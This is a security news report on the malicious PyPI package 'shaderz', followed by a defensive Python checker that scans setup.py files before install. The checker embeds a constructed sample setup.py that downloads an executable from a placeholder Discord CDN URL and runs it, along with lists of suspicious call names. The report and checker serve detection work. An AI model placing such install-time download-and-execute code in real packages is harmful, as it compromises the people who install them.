Researchers at the Fortinet Advanced Research Team discovered a new method employed by an unknown threat group that targets victims through a PyPI (Python Package Index) package called “shaderz.”
The research team shared an in-depth report about the malicious campaign on December 8, 2022. The team had spotted the same campaign lurking on the Python repository website on December 6, 2022.
According to the report, the Python package was published on December 2, 2022, and several questionable details caught the researchers’ attention.
The package had no version beyond the initially published 0.0.1, and it did not clearly describe what it does, its author’s address, or its source page, all of which suggested that the package could be a malicious program.
Hackers using Python packages to target victims
Upon further inspection, the researchers discovered that the package contained malicious code: the setup.py installation script downloaded and ran an executable file on the victim’s system.
The file, named “LMAO,” also contained a URL that led to the Discord app to download more malicious programs onto the victim’s devices.
The URL used in the file, https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe, leads to a Discord page that serves an executable file called stub.exe. Its VirusTotal entry (SHA-256: 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d) also shows it forcing another download that other threat researchers have not detected.
However, some vendors do flag the downloaded executable file as malicious based on the URL and what it intends to do. The research team further examined the executable file and believes it to be a Python script compiled into an executable.
At the time of writing, the researchers were still unraveling the campaign and preparing a follow-up report intended to help companies and threat researchers better understand the executable file.
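As an added example (not code from the Fortinet report or the package itself), the install-time download-and-execute pattern described above can be screened for with a static check over a package’s setup.py before installation. The sample setup.py below is constructed, with a placeholder Discord CDN path, and the call names it flags are assumptions about the common download and process-execution APIs.

```python
import ast
import re

# Constructed sample resembling the reported behavior: setup.py fetches a
# binary from Discord's CDN and launches it during "pip install".
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
import os, tempfile, subprocess, urllib.request
url = "https://cdn.discordapp.com/attachments/000000/000000/stub.exe"  # placeholder
path = os.path.join(tempfile.gettempdir(), "stub.exe")
urllib.request.urlretrieve(url, path)
subprocess.Popen([path])
setup(name="example", version="0.0.1")
'''

# Constructed benign control: declares metadata and nothing else.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example", version="0.0.1", packages=["example"])
'''

# Assumed indicator sets: download helpers, process launchers, CDN hosting.
NETWORK_CALLS = {"urllib.request.urlretrieve", "urlretrieve", "urllib.request.urlopen",
                 "urlopen", "requests.get", "requests.post"}
EXEC_CALLS = {"os.system", "system", "os.popen", "os.startfile", "subprocess.Popen",
              "Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
              "exec", "eval"}
CDN_RE = re.compile(r"https?://cdn\.discordapp\.com/attachments/", re.IGNORECASE)

def _call_name(func):
    """Return the dotted name of a call target, e.g. 'subprocess.Popen'."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))

def audit_setup_py(source):
    """Walk the AST and return sorted findings: network calls, exec calls, CDN URLs."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in NETWORK_CALLS:
                findings.add(f"network: {name}")
            if name in EXEC_CALLS:
                findings.add(f"exec: {name}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CDN_RE.search(node.value):
                findings.add("url: discord cdn attachment")
    return sorted(findings)

def is_download_and_exec(source):
    """True when setup.py both fetches from the network and launches a process."""
    kinds = {f.split(":")[0] for f in audit_setup_py(source)}
    return {"network", "exec"} <= kinds
```

Running `audit_setup_py` over an sdist’s setup.py in CI gives a cheap pre-install gate; a hit on both categories is a reason to block the package and inspect it by hand.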